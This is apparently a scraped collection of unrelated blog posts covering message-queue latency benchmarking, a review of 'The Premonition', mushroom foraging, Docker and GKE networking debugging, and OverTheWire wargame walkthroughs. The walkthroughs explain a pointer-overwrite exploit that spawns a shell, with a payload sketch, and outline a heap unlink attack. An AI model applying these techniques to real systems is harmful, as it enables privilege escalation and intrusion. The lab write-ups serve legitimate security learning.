The team’s production setup is like this.
I defined latency as the time elapsed from when a message is published to when it's received by a subscriber. I didn't count the extra time it takes for a subscriber to acknowledge the message. I used Golang and the same upstream libraries for Kafka and Pub/Sub that they used or would use, respectively, in production. I published messages of various sizes at various rates from AWS EC2 instances in Oregon for five minutes. At the same time, five Google Compute Engine instances in us-central1 subscribed to these messages (pull-based) as fast as possible with an initial burn-in period of one minute. I didn't measure the latency until the burn-in period elapsed to avoid any effects on latency that may arise from using a new topic or subscription or not enough messages flowing through the messaging service. This ensured I more closely mimicked message latency in production. I always took the percentile summary of the subscriber with the second highest p99 latency. I created new Pub/Sub or Kafka topics for each series in the graphs below. Kafka topics always had eight partitions.
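The core of the measurement is simple: stamp each message with its publish time and subtract on receipt. My actual benchmarker is written in Go (linked below); here's a rough Python sketch of the same idea, with placeholder project, topic, and subscription names:

```python
# Sketch only: embed the publish timestamp as a message attribute, then compute
# publish-to-receive latency in the subscriber callback. Ack time is excluded.
# (In the real test the publisher and subscribers run on different machines,
# so clock synchronization matters.)
import time
from google.cloud import pubsub_v1

publisher = pubsub_v1.PublisherClient()
subscriber = pubsub_v1.SubscriberClient()
topic = publisher.topic_path("my-project", "latency-test")                    # placeholder
subscription = subscriber.subscription_path("my-project", "latency-test-sub")  # placeholder

def publish_one(payload: bytes):
    publisher.publish(topic, payload, publish_ms=str(time.time() * 1000))

latencies_ms = []

def callback(message):
    received_ms = time.time() * 1000
    latencies_ms.append(received_ms - float(message.attributes["publish_ms"]))
    message.ack()  # acking happens after the latency is recorded, so it isn't counted

streaming_pull_future = subscriber.subscribe(subscription, callback=callback)
```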
I took some inspiration from a blog post titled “Benchmarking Message Queue Latency” and also found the following GCP post “Testing Cloud Pub/Sub clients to maximize streaming performance.” The latter linked to the code used to benchmark Pub/Sub. Unfortunately, after trying that tool many times and finding it wasn’t documented well or had various issues like this, I gave up and wrote my own simple latency benchmarker in Golang. This was probably better anyways to ensure I was using the same language and client libraries as the team I was helping.
My full results are in this Google sheet. The benchmarking code is at github.com/davidxia/cloud-message-latency.
With my specific test parameters, Kafka p99 latencies are 100-200ms and much lower than Pub/Sub latencies. In the worst case scenarios, Pub/Sub latencies were almost an order of magnitude higher. Pub/Sub p99 latencies were approximately 0.5-1 seconds at the team’s current publisher throughput which is relatively low at about 1KB/s. At higher throughputs the latencies dropped to 300-400ms. This conforms to Google’s documentation and generally accepted knowledge that Pub/Sub performs faster at higher message volumes. According to one of that team’s engineers, this latency is acceptable for all messages except for one which can be changed to a direct service-to-service request.
It was also interesting to see that message delivery was pretty evenly spread out over five subscribers with Pub/Sub. Kafka often had a few consumers that received twice as many messages as their peers.
After I finished benchmarking, I found PerfKitBenchmarker, an open source benchmarking tool used to measure and compare cloud offerings. It looks promising, but I haven’t tried it out yet.
The U.S. Centers for Disease Control (CDC) is portrayed as a risk-averse bureaucracy that wants to study disease and not take strong measures to control disease. Sometimes this interest conflicts with local health officials who want to save lives and see strong measures as necessary even if not all the evidence is available yet. Health officials are always firefighting and can't wait for more data. Lewis compared them to platoon leaders during battle. (page 40)
Deadly mistakes often result from a combination of systemic and human failures. Lewis tells the story of a Veterans Affairs (VA) patient who was accidentally boiled alive in an Atlanta VA hospital. The hospital heated water to a specific temperature hot enough to kill certain bacteria but not hot enough to scald people. Bathtub faucets had a special valve that prevented water that was too hot from emerging. The water heating mechanism was broken, however. So the nurses compensated by adjusting the valve to a hotter temperature. Then one day, plumbers fixed the heating mechanism without telling the nurses. Normally a patient would tell the nurses when the water was too hot. But the nurses happened to be bathing one patient who was an older man with mental health problems. He always screamed no matter what. The nurses didn't think anything was wrong when he screamed this time. "An hour later, the man's skin was peeling away, and he was dying of thermal burns." (67) This is a powerful story. Unfortunately, I'm unable to find corroborating news articles, and Lewis doesn't have references or footnotes.
Why and how people learn.
…people don't learn what is imposed upon them but rather what they freely seek, out of desire or
need. For people to learn, they need to want to learn… “People in an organization learn,” said
Carter. “They’re learning all kinds of things. But they aren’t learning what you are teaching them.
You go to a formal meeting. The important conversation is not in the meeting. It’s in the halls
during the breaks. And usually what’s important is taboo. And you can’t say it in the formal
meeting.”
Is Lewis’ account of the CDC’s aversion to computer models accurate? Premonition says the CDC had models that were just in people’s heads. “They, too, used models. They, too, depended on abstractions to inform their judgments. Those abstractions just happened to be inside their heads.” (85)
One of the two main protagonists of the book is an American physician named Carter Mecher. From 1996 to 2005, Mecher served as the Chief Medical Officer for the Southeast Veterans Administration Network. Mecher wanted to figure out how government should allocate resources.
Each year, Congress would hand more than a hundred billion dollars to Veterans Affairs, and various
people inside the VA would bay for more than they’d gotten the year before. The top brass had no way
to figure out who was actually busting their ass and needed more help and who was loafing…He hated
in particular the way some people were able to use their own inefficiency to create a seeming need
for more funding; and other people, people with a gift for making do with less, were, as a result,
given even less. “It drove out the entrepreneurial spirit,” said Carter.
ICE under the Trump administration was bussing and flying undocumented immigrants into cities in California to manufacture a humanitarian crisis according to the other protagonist of the book, a public health official named Charity Dean. (187, 190) This seemed insane to me, but I was able to find news articles about this. The actual story seems a bit more nuanced as one can read from this AP article “Far from border, US cities feel effect of migrant releases.”
Charity Dean explained to the CDC at the beginning of 2020 that there is no “system of public health in the United States, just a patchwork of state and local health officers, beholden to a greater or lesser degree to local elected officials. Three thousand five hundred separate entities that had been starved of resources for the past forty years.” This explains why the U.S. had no coordinated and science-based approach to Covid. (205-6)
A major antagonist of the book is Sonia Angell. She was the director of California’s Public Health Department and supervisor to Charity Dean who was the deputy director at the time. Lewis describes how she actively prevented any measures to acknowledge the severity of the virus or to try to contain it. Did Lewis try to interview and incorporate Sonia Angell’s side of the story?
A particularly egregious story of CDC incompetence is when they didn’t bother recording the addresses of Americans returning from China.
When local health officers called the CDC to say how hard it was to track down John Smith when the
CDC had listed his residence as “Los Angeles International Airport,” the CDC said, “Just don’t
follow up on them.” What was the point of having these travel restrictions from Wuhan if the federal
government was going to just let people loose upon their return?
There's a particularly enraging and scary part of the book on CDC inaction. Mecher learns about Covid transmission, hospitalization, and death rates among passengers on the Diamond Princess cruise ship. This is a perfect and scary real-life simulation of how Covid will behave in the general population. Mecher compares the situation of the world at the time to the Mann Gulch fire. This was a wildfire that initially looked containable. Thirteen smokejumpers parachuted in to fight it. But then "unexpected high winds caused the fire to suddenly expand, cutting off the men's route and forcing them back uphill. During the next few minutes, a 'blow-up' of the fire covered 3,000 acres (1,200 ha) in ten minutes, claiming the lives of 13 firefighters, including 12 of the smokejumpers. Only three of the smokejumpers survived." Mecher tries desperately to convince the CDC to take strong enough actions.
“I sense confusion among very smart people,” he wrote in early March. “[They] hear that more than
80% of those who are infected have mild disease and that overall case fatality rates are on the
order of .5%. And then they equate these states to a mild outbreak.” … Using the most conservative
assumptions suggested by the cruise ship—an attack rate of 20 percent and a fatality rate of
half of 1 percent—you wound up with 330,000 dead Americans… “You have all been quiet for
most of the discussion over the past several weeks. I would urge you to read the article I just sent
out and upbrief your boss… History will long remember what we do and what we don’t do at this
critical moment. It is time to act and it is past the time to remain silent. This outbreak isn’t
going to magically disappear on its own.”
It’s obvious that people at the top of government agencies at all levels are lost. No one’s coming to save us. Here’s another enraging anecdote about Angell.
On March 6, Gavin Newsom convened a hundred of the state's top officials to discuss the new
coronavirus. Sonia Angell had told Charity that she, Angell, would give the briefing to the
governor, and that it was better if Charity did not attend the meeting. *You have no role*, Angell
explained, *so you should not be there*. Charity didn’t believe Angell had the ability to get up in
front of the audience and explain what was going on. “I just had a feeling that something would
happen and she wouldn’t be able to make it,” she recalled. Sure enough, the morning of the event,
the phone call came. Angell couldn’t make the meeting. Might Charity step in at the last minute to
replace her?
Changes in the media landscape now force technical people to consider how their actions will be cynically perceived, not just whether a decision is the best one on its own merits. (287)
Lewis introduces the interesting concept of L6.
In any large organization, the solution to any crisis was usually found not in the officially
important people at the top but in some obscure employee far down the organization’s chart. A case
in point was the day the software used by the State Department to process visa applications stopped
working. That day the U.S. government simply lost its ability to issue visas… “Six layers down
from the people in charge we found two contractors who actually understand what is broken.” The L6.
The private sector is inefficient at generating knowledge because the profit motive prevents collaboration and openness. (246)
Another story about how the federal government’s laissez-faire attitude towards helping state and local governments secure personal protective equipment led to a market free-for-all that drove prices way up. (253)
Local health offices are understaffed and behind the times. Joseph DeRisi is an American biochemist who heads the Chan Zuckerberg Biohub, a nonprofit research organization. In April 2020, Biohub had developed a Covid test kit and offered it free to any local public health officials who needed it.
Once his team began to deliver free test kits to them, he understood why they’d been slow to take up
the Biohub’s offer of free testing. Many local health officers were so understaffed and
underequipped they had trouble using the test kits. Most were unable to receive the results
electronically; they needed the results faxed to them. Some had fax machines so old that they
couldn’t receive more than six pages at a time. A few didn’t even have functioning fax machines, and
so the Biohub got into the business of buying and delivering fax machines along with test kits.
This story is corroborated by this NYT article “Bottleneck for U.S. Coronavirus Response: The Fax Machine.”
One reason why the CDC is dysfunctional is because Reagan changed its director from being a civil servant to a presidential appointee. (289-90)
Local health officials who were courageous lost their jobs and feared for their safety because there was a lack of leadership from CDC and federal and state leaders. (291)
Do not use this post as any basis for consuming mushrooms yourself. Some mushrooms are extremely poisonous and can be fatal if ingested.
Here’s photos of what we found and my amateur guess at what they are.
We saw what I think is a Boletus pseudosensibilis, but my mom snatched it out of my hands and threw it away before I could take it home.
Monotropa uniflora isn't a fungus, but it needs fungi. It has no chlorophyll and doesn't depend on photosynthesis. It's a saprophyte that gets nutrients by tapping into the resources of trees, indirectly through mycorrhizal fungi.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 |
|
Fixed by setting the following (I use fish shell). I found the first four environment variables in this Github comment. The second two I knew to add because I was seeing errors about the compiler not being able to find the openssl.h and re.h header files.
1 2 3 4 5 6 |
|
A data infrastructure team at work provides a tool for starting a data pipeline job from a local development environment. Let's call this tool foo. This tool depends on gcloud and docker. It creates a user-defined Docker network, runs a utility container called bar connected to that network, and then runs another container called qux that talks to bar to retrieve OAuth tokens from Google Cloud Platform (GCP).
Most developers run foo on their local workstations, e.g. MacBooks. But I have the newer MacBook with the Apple M1 ARM-based chip. Docker Desktop on Mac support for M1s was relatively recent, and I didn't want to deal with Docker weirdness. I also didn't have a lot of free disk space on my 256GB MacBook and thus didn't feel like clogging up my drive with lots of Java, Scala, and Docker gunk.
So I tried running foo on a GCE VM configured by our Puppet configuration files. When I ran foo, I got this error.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 |
|
The HTTP connection timed out. First I checked whether the container started by foo could make a TCP connection to the bar container. I ran foo --verbose run -f data-info.yaml -w DumpKubernetesContainerImagesJob -p 2021-04-26 -r my-project/target/image-name again and did the following in another terminal window.
nsenter is a cool tool that allows you to run programs in different Linux namespaces. It's very useful when you can't get an executable shell into a container with commands like docker exec -it ... bash. This can happen when the container doesn't even include any shells and just has the binary executable, for instance.
1 2 3 4 5 6 7 |
|
So the HTTP connection timeout was caused by an error lower down on the networking stack: an inability to establish a TCP connection. A TCP connection from the host to bar worked though.
1 2 |
|
When I see a networking issue like this, I know there might be some misconfigured firewall rule
blocking IP packets. I listed all the firewall rules. The ones in the filter table’s FORWARD
chain caught my attention.
1 2 3 4 5 6 7 8 9 10 11 |
|
I disabled the GCE VM’s cronned Puppet run and then ran sudo systemctl restart docker
. I ran
bar and a test nginx1 container connected to foo-network
.
1 2 3 4 5 6 7 8 9 10 |
|
Now a TCP connection from the nginx container to bar succeeded.
1 2 |
|
I checked iptables rules again and saw two additional rules (7 and 8) in the filter table’s
FORWARD
chain. Rule 8 allowed IP packets coming in from the br-8ce7e363e4f9
network interface
(in this case a Linux bridge) and leaving through the same interface.
1 2 3 4 5 6 7 8 9 10 11 12 13 |
|
When I re-ran Puppet, rules 7 and 8 were deleted and containers on the foo-network were again unable to establish a TCP connection. I added rule 8 back manually and confirmed that its absence was what caused my error above.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
|
Now running foo
gave a different error.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 |
|
The only background knowledge we need here is that the qux container sends a Google Service Account (GSA) JSON credential with "token_uri": "http://172.20.0.127:80/token". Bar then uses that token for further GCP API requests. So bar needs to query DNS for accounts.google.com. Bar's container logs show that it cannot look up the DNS A record for accounts.google.com by querying 127.0.0.11:53.
1 2 3 4 5 6 7 8 9 10 11 |
|
I wondered why bar was querying 127.0.0.11
for DNS. It turns out this is another loopback
address. In fact, all of 127.0.0.0/8
is loopback according to RFC-6890. I guess Docker
containers that are attached to user-defined Docker networks are configured by default to use
127.0.0.11
in their /etc/resolv.conf
.
1 2 3 4 5 6 7 8 9 10 |
|
Why were these Docker containers configured to query for DNS records on 127.0.0.11
? It turned
out after some Googling that
By default, a container inherits the DNS settings of the host, as defined in the /etc/resolv.conf configuration file. Containers that use the default bridge network get a copy of this file, whereas containers that use a custom network use Docker’s embedded DNS server, which forwards external DNS lookups to the DNS servers configured on the host.
— https://docs.docker.com/config/containers/container-networking/
Now I wondered if Docker’s embedded DNS server is actually running. After some more Googling, I
realized that each container also had its own set of firewall rules. So I listed bar’s nat
table’s DOCKER_OUTPUT
chain’s rules. These two rules showed that the destination port is
changed for TCP packets bound for 127.0.0.11:53 to 37619. UDP packets have their port changed to
58552.
1 2 3 4 5 6 |
|
Whatever’s listening on those ports was accepting TCP and UDP connections.
1 2 3 4 |
|
But there was no DNS reply from either.
1 2 3 4 5 6 7 8 9 10 11 12 13 |
|
Docker daemon was listening for DNS queries at that IP and port from within bar.
1 2 3 4 5 |
|
After enabling "log-level": "debug" in /etc/docker/daemon.json and reloading the configuration file, I saw that the daemon was trying to forward the DNS query to 10.99.0.1. This was the IP of the corp0 bridge network interface which we create instead of the default docker0 bridge network. I saw there was an I/O timeout when the daemon was waiting for the DNS reply.
1 2 3 4 5 |
|
We set dockerd’s upstream DNS server as 10.99.0.1 because we have unbound running as a DNS proxy/cache on the host. We configured it to bind on the bridge interface so Docker containers can hit the host-local unbound instance by routing DNS requests to corp0.
So why can’t the daemon forward IP packets from 172.20.0.127:37928 to 10.99.0.1:53? It seemed like UDP packets sent from bar were able to reach 10.99.0.1:53, but DNS requests failed. I also knew DNS requests from the host to 10.99.0.1:53 worked.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 |
|
My hypothesis at this point was that Docker’s embedded DNS server wasn’t working in some way. After exploring this for a while with no luck, I questioned my assumption that UDP packets from 172.20.0.127:37928 were able to reach 10.99.0.1:53. I realized TCP packets from 172.20.0.127:37928 were not able to reach 10.99.0.1:53.
1 2 |
|
So why were UDP packets able to? Isn’t UDP a fire-and-forget protocol? How can nc
even tell if
an IP and port is listening for UDP packets at all? It was good that I backtracked and questioned
my assumption because it turns out that one cannot distinguish between an open UDP port and
dropped packets en route to that port.
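To make that concrete, here's a toy Python sketch of why the nc result was misleading (the IP and port are the ones from this debugging session):

```python
# A UDP send to a port that silently drops packets looks exactly like a send to an
# open port that never replies: sendto "succeeds" either way.
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.settimeout(2)
s.sendto(b"hello", ("10.99.0.1", 53))   # no error even if the packet goes nowhere
try:
    data, _ = s.recvfrom(512)
    print("got a reply:", data)
except socket.timeout:
    print("no reply: the port could be open-but-silent, filtered, or dropping packets")
```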
So it must be another networking issue which means there must be another firewall rule that’s
blocking packets from the bar container to 10.99.0.1. After a while of looking, I realized the
filter table’s INPUT
chain’s default policy was DROP
and that there was no rule that matched
packets coming in from the br-8ce7e363e4f9
interface.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 |
|
So I added a matching rule that accepted those packets manually.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 |
|
I retried querying for accounts.google.com, and I got a DNS reply!
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
|
But… there’s no A records? Docker daemon logs stated that the upstream local unbound DNS server did not return any A records.
1 2 3 |
|
Hm, I noticed the status in the empty DNS reply is REFUSED
. I recalled that unbound supports
configuring which DNS queries it will reply to based on originating interface and
IP.
1 2 3 4 |
|
Bingo! There’s no access-control
entry that allowed DNS queries from 172.20.0.127. I added
access-control: 172.16.0.0/12 allow
(since all of 172.16.0.0/12 is private IPv4 address space
according to RFC-1918) and reloaded unbound. Now it worked!
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 |
|
Docker daemon logs showed the following.
1 2 3 |
|
Here are the general debugging strategies I used and reinforced for myself.
Translate high-level failures into lower-level commands. gcloud was failing; I translated that into an nc command that simulated the establishment of the TCP connection between containers. Or a DNS query from bar was failing; I translated that into a dig command. And in all these cases, the origin of these IP packets mattered. So knowing how to use nsenter to enter a network namespace and create IP packets that originate from the same container was useful. nsenter is essential when debugging containers that don't have any tools installed in them. The bar image only contains one Go-compiled executable. There are no other tools I can use in there.
Error #1: I created a patch that makes our Puppet installation ignore rules created by Docker networks in the filter table's FORWARD chain.
Error #2: Unfortunately, I don’t think there’s a good solution to this other than disabling our
GCE VM’s periodic Puppet runs and manually adding a rule to allow packets from the new interface.
The chain’s default policy is DROP
, and interface names are dynamic.
Error #3: I made a patch that makes unbound reply to DNS queries with source IPs in the range 172.16.0.0/12.
The large K8s cluster is actually a Google Kubernetes Engine (GKE) cluster with master version 1.17.14-gke.400 and node version 1.17.13-gke.2600. This is a multi-tenant cluster with hundreds of nodes. Each node runs dozens of user workloads. Some users said DNS resolution within their Pods on certain nodes wasn't working. I was able to reproduce this behavior with the following steps.
Kubernetes schedules kube-dns Pods and a Service on the cluster that provide DNS, and configures kubelets to tell individual containers to use the DNS Service's IP to resolve DNS names. See K8s docs here. First I get the kube-dns Service's Cluster IP. This is the IP address to which DNS queries from Pods are sent.
1 2 3 |
|
Then I make DNS queries against the Cluster IP from a Pod running on a broken node.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 |
|
I cordoned and drained the node and added the annotation
cluster-autoscaler.kubernetes.io/scale-down-disabled=true
to prevent the cluster autoscaler from
deleting it.
Then I performed a more basic test. I tested whether I could even make a TCP connection to the Cluster IP on port 53 (default DNS port).
1 2 3 4 |
|
A quarter of the TCP connections fail. This means the error is below the DNS (application) layer, at the TCP layer or lower.
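The check itself can be as simple as a loop of TCP connects; a rough Python equivalent of what I ran (the Cluster IP is the one from this cluster):

```python
# Repeatedly open a TCP connection to the kube-dns Cluster IP on port 53 and count
# how many attempts fail. Run from a Pod on the broken node.
import socket

cluster_ip, port, attempts, failures = "10.178.64.10", 53, 100, 0
for _ in range(attempts):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(2)
    try:
        s.connect((cluster_ip, port))
    except OSError:
        failures += 1
    finally:
        s.close()
print("%d/%d connections failed" % (failures, attempts))
```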
Some background for those unfamiliar. K8s nodes (via the kube-proxy
DaemonSet) will route IP
packets originating from a Pod with a destination of a K8s Service’s Cluster IP to a backing Pod IP
in one of three proxy modes: user space, iptables, and IPVS. I’m assuming GKE
runs kube-proxy
in iptables proxy mode since iptables instead of IPVS is mentioned in their docs
here.
kube-proxy
should keep the node’s iptable rules up to date with the actual kube-dns
Service’s endpoints. The following console output shows how I figured out the IP packet flow by
tracing matching iptables rules.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 |
|
These final rules are the ones that actually replace the destination Cluster IP of 10.178.64.10 with
a randomly chosen kube-dns
Pod IP. The random selection is implemented by the rules in the
KUBE-SVC-ERIFXISQEP7F7OF4
chain which have statistic mode random probability p
. Rules are
matched top down. So the first rule with target KUBE-SEP-BMNCBK7ROA3MA6UU
has a probability of
0.01538461540 of being picked. The second rule with target KUBE-SEP-GYUBQUCI6VR6AER2
has a
probability of 0.01562500000 of being picked. But this 0.01562500000 is applied to the probability
that the first rule didn't match. So its overall probability is (1 - 0.01538461540) * 0.01562500000 ~= 0.01538461540. Applying this calculation to the other rules, you can see each rule has an overall probability of 0.01538461540, or 1/n, of being selected, where n = 65 is the number of kube-dns Pod endpoints these rules cover. This algorithm is actually a variation of reservoir sampling.
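A quick Python sanity check of that arithmetic:

```python
# kube-proxy gives rule i (0-indexed) the printed probability 1/(n-i), and rule i only
# fires if no earlier rule matched, so every endpoint ends up equally likely.
n = 65
remaining = 1.0
for i in range(n):
    rule_p = 1.0 / (n - i)          # probability shown in the iptables rule
    overall = remaining * rule_p    # probability a packet actually hits this rule
    remaining *= (1 - rule_p)
    assert abs(overall - 1.0 / n) < 1e-12
print("each endpoint: %.11f" % (1.0 / n))   # 0.01538461538...
```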
At this point I strongly suspected the iptables rules were stale and routing packets to kube-dns
Pod IPs that no longer exist. In order to confirm this I wanted to find an actual DNAT’ed IP that
didn’t correspond to any actual kube-dns Pod. There were 65 rules in the KUBE-SVC-ERIFXISQEP7F7OF4
chain, but I expected 77 because that was the number of kube-dns
Pods.
1 2 |
|
On nodes without DNS issues, I saw the correct number of rules.
1 2 |
|
I saw this Pod IP when inspecting a randomly chosen rule on my-gke-node
.
1 2 3 4 5 |
|
No kube-dns
Pod existed with this IP.
1 2 |
|
This confirmed kube-proxy
wasn’t updating the iptables rules for kube-dns
. Why? The kube-proxy
logs on the node showed these recurring errors.
1 2 3 4 |
|
I think these kube-proxy
errors are caused by this underlying K8s bug, but I’m not sure.
we found that after the problem occurred all subsequent requests were still send on the same connection. It seems that although the client will resend the request to apiserver, but the underlay http2 library still maintains the old connection so all subsequent requests are still send on this connection and received the same error use of closed connection.
So the question is why http2 still maintains an already closed connection? Maybe the connection it maintained is indeed alive but some intermediate connections are closed unexpectedly?
— https://github.com/kubernetes/kubernetes/issues/87615#issuecomment-596312532
The bug in that issue is fixed in K8s 1.19 and 1.20.
If you’re using GKE and Google Cloud Monitoring, this log query will show which nodes’ kube-proxy Pods can’t get updated Service and Endpoint data from the K8s API.
1 2 3 4 5 |
|
Hint 1: how much data
Connect to the host and port and read all the bytes you can. How many bytes do you get?
Hint 2: endianness
“…read in 4 unsigned integers in host byte order” means the bytes are
already in host byte order or little-endian. If your system is also
little-endian, you don’t need to do anything special when interpreting the
bytes.
Hint 3: expected reply
How many bytes is each integer? What is the sum of all four?
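Putting the hints together, a minimal Python 3 sketch might look like this (the host and port come from the level description; treat the details as assumptions rather than the exact solution):

```python
# Read four 4-byte unsigned integers, sum them, and send the 4-byte sum back.
import socket
import struct

s = socket.create_connection(("vortex.labs.overthewire.org", 5842))
data = s.recv(16)                      # hint 1: four 4-byte integers = 16 bytes
                                       # (a robust version would loop until 16 bytes arrive)
nums = struct.unpack("<4I", data)      # hint 2: host (little-endian) byte order
total = sum(nums) & 0xFFFFFFFF         # hint 3: the sum, kept to 32 bits
s.sendall(struct.pack("<I", total))
print(s.recv(1024))                    # the reply should contain the next level's credentials
```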
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 |
|
This solution assumes we have solved the previous level and can SSH into the machine as user vortex1. Caveat: the machine is extremely slow.
First let’s find out some information about the machine.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 |
|
It’s a machine running Ubuntu 14.04.
1 2 |
|
It’s a 64-bit system.
1 2 |
|
ASLR is disabled.
Hint 1: password location for next level
The instructions don’t tell you this, but the password for the next level is
located in the directory /etc/vortex_pass
.
Hint 2: required permissions
What are the permissions of the password file for the next level? How can you
read this file?
Hint 3: program source code
What does the program do? Can you see the code path you need to execute to
elevate your privileges?
Hint 4: how to change ptr
How can you change the value of ptr to the right value? You shouldn't need to send more than ~300 bytes to the program to do so.
Let’s disassemble the executable to gain some insight into the stack layout.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 |
|
At main+8
, the stack pointer esp
is decreased by 0x220 to make room for unsigned
char buf[512]
, unsigned char *ptr
, and unsigned int x
. If we look more closely at the assembly,
we can see ptr
is located at esp + 0x14
because the instruction before that increases eax
by
0x100
or (sizeof(buf) / 2)
or 256. main+211
shows x
is located right after ptr
at esp +
0x18
since the instruction right before calls getchar()
. This means buf[512]
is after that and
takes up the majority of the stack. So the stack layout is ptr
, x
, then buf[512]
. This makes
sense because the compiler on more modern systems will put buffers after other variables to protect
against buffer overflows.
Question: why is the size of ptr
only 4 bytes? I thought on 64-bit systems pointer variables are 8
bytes not 4 since memory should be 64-bit- or 8-byte-addressable?
We set a breakpoint at the getchar()
call and run the program. Examine the first 64 words of esp
in hexadecimal.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 |
|
ptr
is located at $esp + 0x14 = 0xffffd4d4
which is initialized with a value of 0xffffd5dc
.
Since ASLR is disabled, this location is fixed.
I first thought of a brute-force strategy of decrementing ptr
’s value with \
until its highest
byte was 0xca
. That way, when it’s bit-wise ANDed with 0xff000000
, the result would be
0xca000000
. The exploit would be the following.
1 2 3 4 5 6 7 8 |
|
Aside: the Python command is run in a subshell with an extra cat
to keep the /bin/sh
listening
to more input from the stdout of that subshell. That way we can add more commands from the
terminal. The Python command triggers the /bin/sh
. The cat
with no args just reads from the
current stdin and feeds data to /bin/sh
. See this Stack Exchange answer.
This is definitely not the best solution because 0xffffd5dc - 0xcaffffff = 0x34ffd5dd = 889,181,661. If written to disk, this file would be almost a gigabyte.
Let’s think of a better solution. There’s no lower bound checking on ptr
’s value. So we can
decrement the value of ptr
until it references its own memory address which starts at 0xffffd4d4
.
Then we write 0xca
into the highest byte at 0xffffd4d7
. ptr
’s value is initialized to
0xffffd5dc
. So we write this many \
: 0xffffd5dc - 0xffffd4d7 = 0x105 = 261. Instead of the
seemingly arbitrary 261, we’ll use 512/2 + 5. This is more descriptive because it shows we’re moving
the ptr
reference from where it starts in the middle of buf[512]
back to the beginning and then
past the x
and one byte into itself.
1 2 3 4 5 |
|
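For reference, the payload-generation part boils down to something like this Python 3 sketch (an equivalent, not the exact command I ran):

```python
# 512 // 2 + 5 = 261 backslashes walk ptr back onto its own highest byte at 0xffffd4d7,
# then 0xca lands there so (ptr & 0xff000000) == 0xca000000 holds.
import sys
sys.stdout.buffer.write(b"\\" * (512 // 2 + 5) + b"\xca")
```

As described above, this output would be piped to the program together with a trailing cat so the spawned shell keeps reading commands from our terminal.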
Now that we have a shell as vortex2, we can read the password to advance to the next level.
1 2 3 4 5 6 7 |
|
Hint 1: number of args
You don’t need to use all the available argv
slots used in the executable.
Hint 2: what is $$
What is $$? What is its value in the context of the executable?
Hint 3: file to tar
What file do you need to read? How can you use the program to read it?
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 |
|
The level’s description is
Remote heap level :)
Core files will be in /tmp.
This level is at /opt/protostar/bin/final2
This is the source code.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 |
|
The first line of the description coupled with the fact the code listens on port 2993 means we’ll
have to send a TCP packet that exploits a heap related vulnerability. main()
is pretty simple. It
runs the final2 binary in the background as root and processes requests with get_requests()
.
get_requests()
declares an array of 256 char pointers and reads input strings into it. If any
request size isn’t REQSZ
or 128 bytes, the function breaks out of the while(1)
loop. Any request
payload that doesn’t start with FSRD
also breaks out of the loop. The check_path()
function is
then called and dll
is incremented. A for-loop writes “Process OK” to stdout and frees each string
buffer starting with the oldest.
check_path()
stores a pointer to buf
’s right-most /
in p
. l
is the length of the string
starting from p
. If p
is greater than 0, start
points to the part of buf
that has "ROOT"
.
If "ROOT"
is a substring in buf
, the while loop decrements start
until it finds a /
. Then
memmove()
moves l
bytes of the string starting at p
to start
.
A TCP packet with the string FSRD/ROOT/AAAA
will cause p
to point to the second /
. So p
as a
string is /AAAA
. l
is 5. start
initially points to the R
in ROOT
and later is decremented
to point to the first /
. memmove()
changes the string to FSRD/AAAA/AAAA
.
Notice that start--
doesn’t check the bounds of the string passed in by buf
. It will keep
scanning leftward until it finds some /
. So memmove()
can write to memory outside of the current
string.
We know we’ll need to exploit the free()
call which in this series of exercises uses the
vulnerable dlmalloc unlink()
macro. In a previous post, I showed how this exploit
manipulates heap memory to redirect code execution. We’ll need to inject shellcode via the request
payloads. Our request payloads also need to corrupt heap memory in a way that will trick dlmalloc
into redirecting code to the shellcode.
memmove()
Let’s craft a first payload that will allow the second payload to overwrite heap memory before the
start of the second string. FSRDAAAA...AAAA/AAAA
should work. The second payload can be
FSRDROOTAAA...AAAA/BBBB
. After the second call to check_path()
